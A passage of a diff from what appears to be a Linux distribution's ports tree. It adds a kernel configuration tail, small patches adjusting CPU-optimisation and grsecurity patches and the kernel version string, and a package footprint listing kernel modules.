+CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
+CONFIG_SYSTEM_TRUSTED_KEYRING=y
+CONFIG_SYSTEM_TRUSTED_KEYS=""
+# CONFIG_SYSTEM_EXTRA_CERTIFICATE is not set
+# CONFIG_SECONDARY_TRUSTED_KEYRING is not set
+CONFIG_HAVE_KVM=y
+CONFIG_HAVE_KVM_IRQCHIP=y
+CONFIG_HAVE_KVM_IRQFD=y
+CONFIG_HAVE_KVM_IRQ_ROUTING=y
+CONFIG_HAVE_KVM_EVENTFD=y
+CONFIG_KVM_MMIO=y
+CONFIG_KVM_ASYNC_PF=y
+CONFIG_HAVE_KVM_MSI=y
+CONFIG_HAVE_KVM_CPU_RELAX_INTERCEPT=y
+CONFIG_KVM_VFIO=y
+CONFIG_KVM_GENERIC_DIRTYLOG_READ_PROTECT=y
+CONFIG_KVM_COMPAT=y
+CONFIG_HAVE_KVM_IRQ_BYPASS=y
+CONFIG_VIRTUALIZATION=y
+CONFIG_KVM=y
+CONFIG_KVM_INTEL=y
+# CONFIG_KVM_AMD is not set
+# CONFIG_KVM_DEVICE_ASSIGNMENT is not set
+CONFIG_VHOST_NET=y
+CONFIG_VHOST_SCSI=m
+CONFIG_VHOST_VSOCK=y
+CONFIG_VHOST=y
+CONFIG_VHOST_CROSS_ENDIAN_LEGACY=y
+# CONFIG_BINARY_PRINTF is not set
+
+#
+# Library routines
+#
+CONFIG_RAID6_PQ=y
+CONFIG_BITREVERSE=y
+# CONFIG_HAVE_ARCH_BITREVERSE is not set
+CONFIG_RATIONAL=y
+CONFIG_GENERIC_STRNCPY_FROM_USER=y
+CONFIG_GENERIC_STRNLEN_USER=y
+CONFIG_GENERIC_NET_UTILS=y
+CONFIG_GENERIC_FIND_FIRST_BIT=y
+CONFIG_GENERIC_PCI_IOMAP=y
+CONFIG_GENERIC_IOMAP=y
+CONFIG_GENERIC_IO=y
+CONFIG_ARCH_USE_CMPXCHG_LOCKREF=y
+CONFIG_ARCH_HAS_FAST_MULTIPLIER=y
+CONFIG_CRC_CCITT=y
+CONFIG_CRC16=y
+CONFIG_CRC_T10DIF=y
+CONFIG_CRC_ITU_T=y
+CONFIG_CRC32=y
+# CONFIG_CRC32_SELFTEST is not set
+CONFIG_CRC32_SLICEBY8=y
+# CONFIG_CRC32_SLICEBY4 is not set
+# CONFIG_CRC32_SARWATE is not set
+# CONFIG_CRC32_BIT is not set
+CONFIG_CRC7=y
+CONFIG_LIBCRC32C=y
+# CONFIG_CRC8 is not set
+# CONFIG_AUDIT_ARCH_COMPAT_GENERIC is not set
+# CONFIG_RANDOM32_SELFTEST is not set
+CONFIG_ZLIB_INFLATE=y
+CONFIG_ZLIB_DEFLATE=y
+CONFIG_LZO_COMPRESS=y
+CONFIG_LZO_DECOMPRESS=y
+CONFIG_LZ4_DECOMPRESS=y
+CONFIG_XZ_DEC=y
+CONFIG_XZ_DEC_X86=y
+# CONFIG_XZ_DEC_POWERPC is not set
+# CONFIG_XZ_DEC_IA64 is not set
+# CONFIG_XZ_DEC_ARM is not set
+# CONFIG_XZ_DEC_ARMTHUMB is not set
+# CONFIG_XZ_DEC_SPARC is not set
+CONFIG_XZ_DEC_BCJ=y
+# CONFIG_XZ_DEC_TEST is not set
+CONFIG_DECOMPRESS_GZIP=y
+CONFIG_DECOMPRESS_BZIP2=y
+CONFIG_DECOMPRESS_LZMA=y
+CONFIG_DECOMPRESS_XZ=y
+CONFIG_DECOMPRESS_LZO=y
+CONFIG_DECOMPRESS_LZ4=y
+CONFIG_GENERIC_ALLOCATOR=y
+CONFIG_TEXTSEARCH=y
+CONFIG_TEXTSEARCH_KMP=y
+CONFIG_TEXTSEARCH_BM=y
+CONFIG_TEXTSEARCH_FSM=y
+CONFIG_INTERVAL_TREE=y
+CONFIG_RADIX_TREE_MULTIORDER=y
+CONFIG_ASSOCIATIVE_ARRAY=y
+CONFIG_HAS_IOMEM=y
+CONFIG_HAS_IOPORT_MAP=y
+CONFIG_HAS_DMA=y
+CONFIG_CHECK_SIGNATURE=y
+CONFIG_CPU_RMAP=y
+CONFIG_DQL=y
+CONFIG_GLOB=y
+# CONFIG_GLOB_SELFTEST is not set
+CONFIG_NLATTR=y
+CONFIG_CLZ_TAB=y
+# CONFIG_CORDIC is not set
+# CONFIG_DDR is not set
+CONFIG_IRQ_POLL=y
+CONFIG_MPILIB=y
+CONFIG_LIBFDT=y
+CONFIG_OID_REGISTRY=y
+CONFIG_UCS2_STRING=y
+CONFIG_FONT_SUPPORT=y
+# CONFIG_FONTS is not set
+CONFIG_FONT_8x8=y
+CONFIG_FONT_8x16=y
+# CONFIG_SG_SPLIT is not set
+CONFIG_SG_POOL=y
+CONFIG_ARCH_HAS_SG_CHAIN=y
+CONFIG_ARCH_HAS_PMEM_API=y
+CONFIG_ARCH_HAS_MMIO_FLUSH=y
+CONFIG_SBITMAP=y
diff --git a/linux/ports/linux-blob/port-blob-cpu.patch b/linux/ports/linux-blob/port-blob-cpu.patch
new file mode 100644
index 0000000..8530806
--- /dev/null
+++ b/linux/ports/linux-blob/port-blob-cpu.patch
@@ -0,0 +1,11 @@
+--- enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch.orig	2017-02-14 20:15:28.629583505 +0000
++++ enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch	2017-02-14 20:22:54.566232597 +0000
+@@ -440,7 +440,7 @@
+  # generates cmov.
+  config X86_CMOV
+  	def_bool y
+--	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
++-	depends on (MK8 || MK7 || MCORE2 || MPSC || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
+ +	depends on (MK8 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MJAGUAR || MK7 || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MNATIVE || MATOM || MGEODE_LX)
+  
+  config X86_MINIMUM_CPU_FAMILY
diff --git a/linux/ports/linux-blob/port-blob-grsecurity.patch b/linux/ports/linux-blob/port-blob-grsecurity.patch
new file mode 100644
index 0000000..ba2fb6d
--- /dev/null
+++ b/linux/ports/linux-blob/port-blob-grsecurity.patch
@@ -0,0 +1,28 @@
+--- grsecurity-3.1-4.9.12-201702231830.patch	2017-02-18 05:14:08.682388834 +0000
++++ grsecurity-3.1-4.9.12-201702231830.patch	2017-02-18 05:15:45.579051680 +0000
+-diff --git a/localversion-grsec b/localversion-grsec
+-new file mode 100644
+-index 0000000..7cd6065
+---- /dev/null
+-+++ b/localversion-grsec
+-@@ -0,0 +1 @@
+-+-grsec
+ diff --git a/mm/Kconfig b/mm/Kconfig
+ index 86e3e0e..ab679cf 100644
+ --- a/mm/Kconfig
+--- grsecurity-3.1-4.9.12-201702231830.patch	2017-02-18 09:07:57.220274062 +0000
++++ grsecurity-3.1-4.9.12-201702231830.patch	2017-02-18 09:08:16.380274647 +0000
+@@ -156547,13 +156547,6 @@
+  			break;
+  		}
+  
+-diff --git a/localversion-grsec b/localversion-grsec
+-new file mode 100644
+-index 0000000..7cd6065
+---- /dev/null
+-+++ b/localversion-grsec
+-@@ -0,0 +1 @@
+-+-grsec
+ diff --git a/mm/Kconfig b/mm/Kconfig
+ index 86e3e0e..ab679cf 100644
+ --- a/mm/Kconfig
diff --git a/linux/ports/linux-blob/port-blob-make.patch b/linux/ports/linux-blob/port-blob-make.patch
new file mode 100644
index 0000000..67ee22e
--- /dev/null
+++ b/linux/ports/linux-blob/port-blob-make.patch
@@ -0,0 +1,11 @@
+--- Makefile	2017-02-18 04:48:37.675782509 +0000
++++ Makefile.orig	2017-02-18 04:48:23.425783067 +0000
+@@ -1,7 +1,7 @@
+ VERSION = 4
+ PATCHLEVEL = 9
+ SUBLEVEL = 12
+-EXTRAVERSION =
++EXTRAVERSION = -blob
+ NAME = Roaring Lionus
+ 
+ # *DOCUMENTATION*
diff --git a/linux/ports/linux-gnu/.footprint b/linux/ports/linux-gnu/.footprint
new file mode 100644
index 0000000..baf16d8
--- /dev/null
+++ b/linux/ports/linux-gnu/.footprint
@@ -0,0 +1,975 @@
+drwxr-xr-x	root/root	boot/
+-rw-r--r--	root/root	boot/System.map-4.9.111-gnu
+-rw-r--r--	root/root	boot/config-4.9.111-gnu
+-rw-r--r--	root/root	boot/vmlinuz-4.9.111-gnu
+drwxr-xr-x	root/root	lib/
+drwxr-xr-x	root/root	lib/modules/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/
+lrwxrwxrwx	root/root	lib/modules/<kernel-version>/build -> /usr/src/linux-4.9.111
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/arch/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/arch/x86/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/arch/x86/platform/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/arch/x86/platform/intel/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/arch/x86/platform/intel/iosf_mbi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/acpi/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/acpi/dptf/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/acpi/dptf/dptf_power.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/acpi/nfit/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/acpi/nfit/nfit.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/ahci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/ata_generic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/ata_piix.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/libahci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_ali.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_amd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_artop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_atiixp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_cmd640.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_cmd64x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_cypress.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_efar.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_hpt366.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_hpt37x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_hpt3x2n.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_hpt3x3.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_it8213.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_it821x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_jmicron.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_marvell.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_mpiix.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_netcell.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_ninja32.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_ns87410.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_ns87415.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_oldpiix.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_opti.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_optidma.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_pcmcia.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_pdc2027x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_radisys.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_rz1000.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_sch.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_serverworks.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_sil680.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_sis.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_sl82c105.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_triflex.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pata_via.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/pdc_adma.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_inic162x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_mv.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_nv.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_promise.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_qstor.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_sil.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_sil24.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_sis.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_svw.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_sx4.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_uli.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_via.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ata/sata_vsc.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/bcma/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/bcma/bcma.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/block/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/block/loop.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/char/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/char/agp/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/char/agp/amd64-agp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/char/agp/intel-agp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/char/agp/intel-gtt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/char/nvram.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/clk/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/clk/clk-cdce706.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/clk/clk-cs2000-cp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/clk/clk-si5351.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/connector/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/connector/cn.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/acpi-cpufreq.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/amd_freq_sensitivity.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/cpufreq_conservative.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/cpufreq_powersave.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/cpufreq_userspace.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/p4-clockmod.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/pcc-cpufreq.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/powernow-k8.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/cpufreq/speedstep-lib.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/dca/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dca/dca.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/dw/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/dw/dw_dmac.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/dw/dw_dmac_core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/dw/dw_dmac_pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/idma64.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/ioat/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/ioat/ioatdma.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/qcom/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/qcom/hdma.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/qcom/hdma_mgmt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/dma/virt-dma.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/firewire/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/firewire/firewire-core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/firewire/firewire-ohci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/firewire/firewire-sbp2.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/firmware/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/firmware/dmi-sysfs.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/firmware/iscsi_ibft.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-adp5588.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-amd8111.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-amdpt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-bt8xx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-dwapb.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-f7188x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-generic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-ich.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-it87.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-lynxpoint.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-max7300.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-max7301.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-max730x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-max732x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-mc33880.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-ml-ioh.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-pca953x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-pcf857x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-pisosr.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-rdc321x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-sch.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-sch311x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-tpic2810.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpio/gpio-ts4900.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/amd/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/amd/amdgpu/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/amd/amdgpu/amdgpu.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/gma500/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/gma500/gma500_gfx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/i915/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/i915/i915.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/nouveau/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/nouveau/nouveau.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/radeon/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/radeon/radeon.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/udl/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/udl/udl.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/vmwgfx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/gpu/drm/vmwgfx/vmwgfx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-a4tech.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-apple.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-belkin.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-cherry.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-chicony.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-cypress.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-ezkey.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-generic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-kensington.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-logitech-dj.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-logitech-hidpp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-logitech.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-microsoft.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/hid-monterey.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/i2c-hid/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/i2c-hid/i2c-hid.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/intel-ish-hid/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/intel-ish-hid/intel-ish-ipc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/intel-ish-hid/intel-ishtp-hid.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/intel-ish-hid/intel-ishtp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hid/uhid.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/abituguru.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/abituguru3.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/acpi_power_meter.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ad7314.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ad7414.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ad7418.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adc128d818.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adcxx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm1021.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm1025.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm1026.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm1029.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm1031.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adm9240.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ads1015.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ads7828.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ads7871.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7310.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7410.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7411.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7462.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7470.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7475.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/adt7x10.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/amc6821.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/applesmc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/asb100.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/asc7621.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/asus_atk0110.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/atxp1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/coretemp.ko
